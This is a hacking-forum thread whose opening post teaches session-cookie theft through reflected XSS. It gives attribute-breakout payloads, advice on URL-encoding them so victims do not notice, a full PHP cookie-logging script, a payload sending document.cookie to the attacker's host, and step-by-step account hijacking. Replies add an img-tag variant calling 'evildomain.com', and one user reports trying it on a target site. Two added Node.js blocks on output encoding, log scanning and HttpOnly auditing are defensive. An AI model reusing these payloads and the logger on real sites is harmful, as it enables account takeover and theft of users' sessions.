Author Topic: Stealing Cookie With XSS  (Read 13855 times)


Offline 1Mirek

  • Serf
  • *
  • Posts: 22
  • Cookies: -5
  • #!/usr/bin/perl
    • View Profile
    • Liquid-Security
Stealing Cookie With XSS
« on: August 06, 2011, 08:14:53 am »
I guess you already know a bit of the theory behind XSS, so we'll get right to the code.

Let's say a web page has a search function that uses this code:
Code:
<tr><td>Name</td><td><input type="text" name="advisor_name" value=""></td></tr>
We want to exploit this page using XSS. How do we do that? We know that we want to inject our own script into the value field (this field is tied to the search box we can enter text into). We could start by using a test script:

Code:
<script>alert("test")</script>
When we enter this into the search box and click search, nothing happens. Why? It's still inside the value quotes, which turn the entire script into plaintext. If you look at the page source now, you see that the above portion of code now looks like this:

Code:
<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>
Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:

Code:
"><script>alert("test")</script>
This should close the quotes and end the input section so that our script can be rendered as a part of the source instead of plaintext. And now when we hit enter we get a nice pop-up box saying "test", showing us our script was executed. Keep in mind that you're not actually writing this data to the server (unless you're injecting it with a script that actually modifies the page on the server's end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page. For example:

Code:
http://www.site.com/search.php?q="><script>alert("test")</script>
Of course, if you don't want the recipient to see the injection, you'll need to hex the query. You can do that here: http://centricle.com/tools/ascii-hex/

Hexing the query of this URL gives us:

Code:
http://www.site.com/search.php?q=%22%3E%3Cscript%3Ealert(%22test%22)%3C%2Fscript%3E

The above is a very simple case of finding an XSS injection vulnerability. Some HTML and JavaScript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS to Steal Cookies

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their session cookie. By modifying your session cookie (see the above linked tutorial), you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you'll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):

Code:
<?php

// Pick the most specific client address the web server exposes.
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}

// Append one line describing the current request (including its query string) to log.txt.
function logData()
{
    $ipLog = "log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_globals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['REQUEST_METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date = date("l dS of F Y h:i:s A");
    $log = fopen("$ipLog", "a+");

    // Use an HTML line break if the log file is itself an HTML file, a blank line otherwise.
    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE:  $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE: $date | COOKIE:  $cookie \n\n");
    fclose($log);
}

logData();

?>

This script will record the cookies of every user that views it.

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:

Code:
"><script language="JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie=" + document.cookie;document.location="http://www.whateversite.com"</script>

yoursite.com is the server you're hosting your cookie stealer and log file on, and whateversite.com is the vulnerable page you're exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don't know anything happened. Note that this injection will only work properly if you aren't actually modifying the page source on the server's end. Otherwise the unmodified page will actually be the modified page and you'll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:

Code:
logData();
?>


to this:

Code:
logData();

echo '<b>Page Under Construction</b>';
?>

Now when you open log.txt, you should see something like this:

Code:
IP: 125.16.48.169 | PORT: 56840 | HOST:  |  Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0. Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD:  | REF: http://www.ifa.org.nz/search.php | 

DATE: Tuesday 21st 2009f April 2009 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373


You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up Firebug and add/modify all your cookie's fields to match the data from the cookie in your log file and refresh the page. The server thinks you're the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.


1. Test the page to make sure it's vulnerable to XSS injections.
2. Once you know it's vulnerable, upload the cookie stealer php file and log file to your server.
3. Insert the injection into the page via the url or text box.
4. Grab the link of that page with your exploited search query (if injection is not stored on the server's copy of the page).
5. Get someone to use that link if necessary.
6. Check your log file for their cookie.
7. Modify your own cookie to match the captured one and refresh the page.
« Last Edit: August 06, 2011, 09:21:04 am by 1Mirek »
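The search page in the post is exploitable only because the server writes the query straight into the value attribute. The following is an added example, not code from the post or the forum, written in Node.js from the site owner's side: it shows the vulnerable rendering beside an attribute-encoded one, and a small scanner over constructed access-log lines that flags the kind of reflected payloads the thread shows (script tags, img tags, document.cookie). The function names (renderVulnerable, renderSafe, escapeAttr, scanLogLine, scanLog) and the sample log lines are assumptions made for this example.

```javascript
// Added example (not from the original post): why the search box is exploitable
// and how the server should render it instead. Node.js, no dependencies.

// Vulnerable rendering: the query is concatenated straight into the attribute,
// so a value starting with "> closes the attribute and the tag.
function renderVulnerable(query) {
  return '<tr><td>Name</td><td><input type="text" name="advisor_name" value="' + query + '"></td></tr>';
}

// HTML attribute encoding: every character that could end the attribute or
// start a tag becomes an entity, so the value can never leave the quotes.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hardened rendering: same template, encoded value.
function renderSafe(query) {
  return '<tr><td>Name</td><td><input type="text" name="advisor_name" value="' + escapeAttr(query) + '"></td></tr>';
}

// True if the rendered HTML contains a real <script tag (i.e. the payload escaped the attribute).
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Detection side: the vulnerable site's own access log carries the payload in the
// query string, usually percent-encoded. Decode it and look for markup that has
// no business in a search term.
const SUSPICIOUS = [/<\s*script\b/i, /<\s*img\b/i, /document\.cookie/i, /on\w+\s*=/i];

// Common Log Format line -> { target, hits } when a pattern matches, else null.
function scanLogLine(line) {
  const m = line.match(/"(?:GET|POST) ([^ ]+) HTTP/);
  if (!m) return null;
  let target = m[1];
  try { target = decodeURIComponent(target); } catch (e) { /* keep raw if malformed */ }
  const hits = SUSPICIOUS.filter((re) => re.test(target)).map((re) => re.source);
  return hits.length ? { target, hits } : null;
}

function scanLog(lines) {
  return lines.map(scanLogLine).filter(Boolean);
}

// Constructed sample log lines (not real traffic): one benign search, one reflected
// script tag, one img-tag variant of the kind discussed later in the thread.
const SAMPLE_LOG = [
  '10.0.0.5 - - [06/Aug/2011:08:14:53 +0000] "GET /search.php?q=advisor HTTP/1.1" 200 512',
  '10.0.0.9 - - [06/Aug/2011:08:15:10 +0000] "GET /search.php?q=%22%3E%3Cscript%3Ealert(%22test%22)%3C%2Fscript%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [06/Aug/2011:08:16:02 +0000] "GET /search.php?q=%22%3E%3Cimg%20src%3D%22http%3A%2F%2Fexample.invalid%2Fi.php%3Fc%3D%22%2Bdocument.cookie%3E HTTP/1.1" 200 640',
];

if (typeof require !== 'undefined' && require.main === module) {
  const payload = '"><script>alert("test")</script>';
  console.log(renderVulnerable(payload));
  console.log(renderSafe(payload));
  console.log(scanLog(SAMPLE_LOG));
}
```

Run it with node to see the two renderings side by side: in the safe one the payload shows up literally in the text box, because `&quot;` and `&lt;` cannot terminate the attribute. The log scanner is deliberately simple (a handful of regular expressions after one round of URL decoding); in production you would also decode HTML entities and double-encoding before matching.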

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #1 on: August 06, 2011, 08:05:27 pm »
I like loading an IMG tag with the php script's URL better than redirecting the entire thing. Simply making a 1x1 transparent image once the PHP script is done loading. Makes it slightly more silent.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline Scream

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #2 on: February 04, 2012, 01:14:07 am »
nice .... thanks :)

Offline TJSmiffy

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #3 on: February 11, 2012, 05:38:38 pm »
ok, so I followed this pretty much exactly and found my target site etc. but the one thing I can't do is find a decent server hoster where I can link my file properly. I get stuck with this: javascript:submitBrowseForm('/','something.php','downloadfile',''); as the link. tried multiple things but any ideas?

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #4 on: February 11, 2012, 05:44:07 pm »
ok, so I followed this pretty much exactly and found my target site etc. but the one thing I can't do is find a decent server hoster where I can link my file properly. I get stuck with this: javascript:submitBrowseForm('/','something.php','downloadfile',''); as the link. tried multiple things but any ideas?

I do not think submitBrowseForm('/','something.php','downloadfile',''); is a valid javascript command.

Offline TJSmiffy

  • NULL
  • Posts: 2
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #5 on: February 11, 2012, 05:46:26 pm »
that's what I was thinking, I only want the actual link to my document though, which keeps referring me to this

Offline fruitcake2212

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: Stealing Cookie With XSS
« Reply #6 on: June 26, 2012, 10:26:33 pm »
I like loading a IMG tag with the php script's URL better than redirecting the entire thing. Simply making a 1x1 transparent image once the PHP script is done loading. Makes it slightly more silent.

This seems a nice trick
The image must be inside a <script> tag for this to work? (cos we need document.cookie)

edit: nice tut 1Mirek btw
« Last Edit: June 26, 2012, 11:10:03 pm by fruitcake2212 »

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #7 on: June 28, 2012, 12:15:09 am »
This seems a nice trick
The image must be inside a <script> tag for this to work? (cos we need document.cookie)

edit: nice tut 1Mirek btw

This is a rather old thread but okay.

The idea is to XSS a <img src="http://evildomain.com/image.php?cookie=derp" />

Offline fruitcake2212

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: Stealing Cookie With XSS
« Reply #8 on: June 30, 2012, 06:03:43 am »
Yeah sorry I thought it was not worth to start a new thread for this lil question

but... wouldn't it look more like this? : <img src="http://evildomain.com/image.php?cookie=" + document.cookie />

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #9 on: June 30, 2012, 06:11:11 pm »
Yeah sorry I thought it was not worth to start a new thread for this lil question

but... wouldn't it look more like this? : <img src="http://evildomain.com/image.php?cookie=" + document.cookie />


Yes, exactly. But make sure the + document.cookie is inside the quotes tho.

Offline fruitcake2212

  • /dev/null
  • *
  • Posts: 12
  • Cookies: 1
    • View Profile
Re: Stealing Cookie With XSS
« Reply #10 on: July 01, 2012, 02:46:53 am »
make sure the + document.cookie is inside the quotes tho.

thanks, I wasn't sure about that

Offline Pythonista

  • /dev/null
  • *
  • Posts: 6
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #11 on: July 01, 2012, 08:03:16 am »
So we know how to steal a session cookie, so what could the victim do to prevent this from happening? Any links or suggestions? I'm sure HTTPS would make this more difficult, but what else could they do that we need to take into consideration?

Offline Kulverstukas

  • Administrator
  • Zeus
  • *
  • Posts: 6627
  • Cookies: 542
  • Fascist dictator
    • View Profile
    • My blog
Re: Stealing Cookie With XSS
« Reply #12 on: July 01, 2012, 09:56:39 am »
HTTPS is one thing that is secure enough. SSH tunneling is another thing that could be used...

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
    • View Profile
Re: Stealing Cookie With XSS
« Reply #13 on: July 01, 2012, 05:13:59 pm »
So we know how to steal a session cookie, so what would could the victim do to prevent this from happening? Any links or suggestions? I'm sure HTTPS would make this more difficult, but what else could they do that we need to take into consideration?

The victim cannot do anything (in most cases). The site owner(s) on the other hand can fix the XSS flaw.

HTTPS wouldn't do anything. This is NOT a HTTP flaw, this is a code flaw. If anyone is to blame it's lazy and unknowledgeable coders.

@Kulverstukas, SSH wouldn't make any difference either.
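The reply above puts the fix on the site owner, and output encoding is the real fix. A second server-side control the thread does not mention is the session cookie's own attributes: a cookie set with HttpOnly is omitted from document.cookie, so the payloads in this thread get an empty string even when the XSS is present. The following is an added example, not code from the thread, in Node.js: it parses Set-Cookie headers, reports which of HttpOnly, Secure and SameSite are missing, and models what document.cookie would return for a given set of cookies. The function names (parseSetCookie, auditSessionCookie, visibleToScript) and the two sample headers are assumptions made for this example.

```javascript
// Added example (not from the thread): audit Set-Cookie headers for the
// attributes that limit what an injected script can do with a session cookie.

// Parse one Set-Cookie header value into its name, value and attribute map
// (attribute names lower-cased; flag attributes map to true).
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const [name, ...valueParts] = parts[0].split('=');
  const attrs = {};
  for (const p of parts.slice(1)) {
    const [k, ...v] = p.split('=');
    attrs[k.trim().toLowerCase()] = v.length ? v.join('=').trim() : true;
  }
  return { name: name.trim(), value: valueParts.join('='), attrs };
}

// Report which defences are missing on a cookie that carries a session token.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  // HttpOnly keeps the cookie out of document.cookie, so an injected script
  // cannot read it even when an XSS flaw exists on the page.
  if (!c.attrs.httponly) findings.push('missing HttpOnly: readable via document.cookie');
  // Secure stops the browser from sending the cookie over plain HTTP.
  if (!c.attrs.secure) findings.push('missing Secure: sent over plaintext HTTP');
  // SameSite (Lax or Strict) stops most cross-site requests from carrying it.
  const ss = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : null;
  if (!ss || ss === 'none') findings.push('SameSite absent or None: sent on cross-site requests');
  return { name: c.name, findings };
}

// Model document.cookie for a set of Set-Cookie headers: by the HttpOnly rule,
// cookies carrying that flag are left out of the script-visible string.
function visibleToScript(headers) {
  return headers
    .map(parseSetCookie)
    .filter((c) => !c.attrs.httponly)
    .map((c) => `${c.name}=${c.value}`)
    .join('; ');
}

// Constructed headers (the session id is made up): the weak setting beside the corrected one.
const WEAK = 'PHPSESSID=constructedsessionid0001; path=/';
const HARDENED = 'PHPSESSID=constructedsessionid0001; Path=/; Secure; HttpOnly; SameSite=Lax';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditSessionCookie(WEAK));
  console.log(auditSessionCookie(HARDENED));
  console.log('document.cookie (weak):    ', JSON.stringify(visibleToScript([WEAK])));
  console.log('document.cookie (hardened):', JSON.stringify(visibleToScript([HARDENED])));
}
```

In PHP the hardened header corresponds to the `session.cookie_httponly`, `session.cookie_secure` and `session.cookie_samesite` ini settings. HttpOnly does not remove the XSS flaw; an injected script can still act as the user from within the page, so the attribute is a damage limiter alongside output encoding, not a replacement for it.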

Offline h4ppy_4rtist

  • Serf
  • *
  • Posts: 35
  • Cookies: 0
    • View Profile
Re: Stealing Cookie With XSS
« Reply #14 on: July 02, 2012, 05:33:18 pm »
The insertion of those scripts wouldn't work if the victim uses extensions like adblock or just disabled javascript... But against the method with img-tag or something similar the victim is helpless, as said before..
[[ We're all some kind of artists. ]]